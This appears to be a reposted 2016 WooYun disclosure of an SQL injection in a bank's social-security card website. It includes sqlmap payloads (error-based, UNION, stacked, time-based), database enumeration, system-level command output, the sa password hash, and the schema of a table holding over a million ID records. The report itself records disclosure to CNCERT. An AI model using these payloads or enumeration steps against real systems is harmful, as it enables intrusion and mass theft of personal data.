药都银行社保网站某处漏洞(SA权限)直接导致上百万(1078442)社保卡信息泄露(单位名、姓名、身份证)

2017年4月10日07:50:22评论309 views字数 261阅读0分52秒阅读模式

摘要

2016-03-30：细节已通知厂商并且等待厂商处理中
2016-04-01：厂商已经确认，细节仅向厂商公开
2016-04-11：细节向核心白帽子及相关领域专家公开
2016-04-21：细节向普通白帽子公开
2016-05-01：细节向实习白帽子公开
2016-05-16：细节向公众公开

漏洞概要关注数(8) 关注此漏洞

缺陷编号： WooYun-2016-190587

漏洞标题：药都银行社保网站某处漏洞(SA权限)直接导致上百万(1078442)社保卡信息泄露(单位名、姓名、身份证)

漏洞作者：路人甲

提交时间： 2016-03-30 11:30

公开时间： 2016-05-16 17:40

漏洞类型： SQL注射漏洞

危害等级：高

自评Rank： 13

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签：注射技巧

1人收藏

漏洞详情

披露状态：

简要描述：

如题、、、

详细说明：

药都银行社保网站某处漏洞直接导致上百万(1078442)社保卡信息泄露(单位名、姓名、身份证)。。。

发现是SA权限可以直接getshell 这里就没有近一步深入了。。。。点到为止、、、

泄露上百万的社保信息 dbo.CARDS | 1078442 |

注入点：http://**.**.**.**/Web/LianxiDetail.aspx?dwcode=

code 区域

sqlmap identified the following injection points with a total of 0 HTTP(s) reque
 sts:
 ---
 Place: GET
 Parameter: dwcode
     Type: error-based
     Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
     Payload: dwcode=' AND 8199=CONVERT(INT,(CHAR(58) CHAR(98) CHAR(105) CHAR(120
 ) CHAR(58) (SELECT (CASE WHEN (8199=8199) THEN CHAR(49) ELSE CHAR(48) END)) CHAR
 (58) CHAR(113) CHAR(113) CHAR(106) CHAR(58))) AND 'emiL'='emiL
 
     Type: UNION query
     Title: Generic UNION query (NULL) - 4 columns
     Payload: dwcode=' UNION ALL SELECT NULL,NULL,CHAR(58) CHAR(98) CHAR(105) CHA
 R(120) CHAR(58) CHAR(65) CHAR(102) CHAR(119) CHAR(71) CHAR(84) CHAR(76) CHAR(73)
  CHAR(84) CHAR(71) CHAR(81) CHAR(58) CHAR(113) CHAR(113) CHAR(106) CHAR(58),NULL
 --
 
     Type: stacked queries
     Title: Microsoft SQL Server/Sybase stacked queries
     Payload: dwcode='; WAITFOR DELAY '0:0:5'--
 
     Type: AND/OR time-based blind
     Title: Microsoft SQL Server/Sybase time-based blind
     Payload: dwcode=' WAITFOR DELAY '0:0:5'--
 ---
 [22:53:00] [INFO] the back-end DBMS is Microsoft SQL Server
 web server operating system: Windows 2003
 web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
 back-end DBMS: Microsoft SQL Server 2005
 
 available databases [6]:
 [*] master
 [*] model
 [*] msdb
 [*] tempdb
 [*] webshebao
 [*] zwcrm
 
 
 current user:    'sa'
 
 [23:10:57] [INFO] retrieved: "nt authority////system"
 command standard output [1]:
 [*] nt authority/system
 
 
 
 
 D:/YCCB_WORK/社保卡发放小秘书/NongJin/HongZhi.Pro.Bank.Web.NongJin/CLASS/DAL/CARD_DAL.cs:150
 
 database management system users password hashes:
 [*] sa [1]:
     password hash: 0x01004086ceb618b79b04cd0e09daaf6c1290848db4372d779541
         header: 0x0100
         salt: 4086ceb6
         mixedcase: 18b79b04cd0e09daaf6c1290848db4372d779541
 
 
 current database:    'webshebao'

漏洞证明：

code 区域

Database: webshebao
 [2 tables]
 +-------+
 | CARDS |
 | LX    |
 +-------+
 
 
 Database: webshebao
 +-----------+---------+
 | Table     | Entries |
 +-----------+---------+
 | dbo.CARDS | 1078442 |   单位名、姓名、身份证
 | dbo.LX    | 50      |
 +-----------+---------+
 
 Database: webshebao
 Table: CARDS
 [6 columns]
 +--------------+----------+
 | Column       | Type     |
 +--------------+----------+
 | dwname       | nvarchar |
 | ID           | int      |
 | name         | nvarchar |
 | shenfenzheng | nvarchar |
 | shoulicode   | nvarchar |
 | state        | nvarchar |
 +--------------+----------+

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：11

确认时间：2016-04-01 17:38

厂商回复：

CNVD确认所述情况,已经转由CNCERT向银行业信息化主管部门通报,由其后续协调网站管理单位处置；同时转由CNCERT发安徽分中心。

漏洞评价：

对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

2016-03-30 11:50 | Marioo ( 实习白帽子 | Rank:82 漏洞数:22 | 我其实是很帅的)

1

补天上有 https://butian.360.cn/vul/info/id/132176

1# 回复此人
2016-03-30 14:17 | 田老板 ( 路人 | Rank:30 漏洞数:13 | 学校杀手)

1

补天上有 https://butian.360.cn/vul/info/id/132176

2# 回复此人

漏洞概要 关注数(8) 关注此漏洞

缺陷编号： WooYun-2016-190587

漏洞标题： 药都银行社保网站某处漏洞(SA权限)直接导致上百万(1078442)社保卡信息泄露(单位名、姓名、身份证)

相关厂商： 药都银行

漏洞作者： 路人甲

提交时间： 2016-03-30 11:30

公开时间： 2016-05-16 17:40

漏洞类型： SQL注射漏洞

危害等级： 高

自评Rank： 13

漏洞状态： 已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签： 注射技巧

1人收藏

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

漏洞评价(共0人评价): 登陆后才能进行评分

评价

发表评论

在线咨询

微信

漏洞概要关注数(8) 关注此漏洞

漏洞标题：药都银行社保网站某处漏洞(SA权限)直接导致上百万(1078442)社保卡信息泄露(单位名、姓名、身份证)

相关厂商：药都银行

漏洞作者：路人甲

危害等级：高

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签：注射技巧

版权声明：转载请注明来源路人甲@乌云

漏洞评价(共0人评价):

登陆后才能进行评分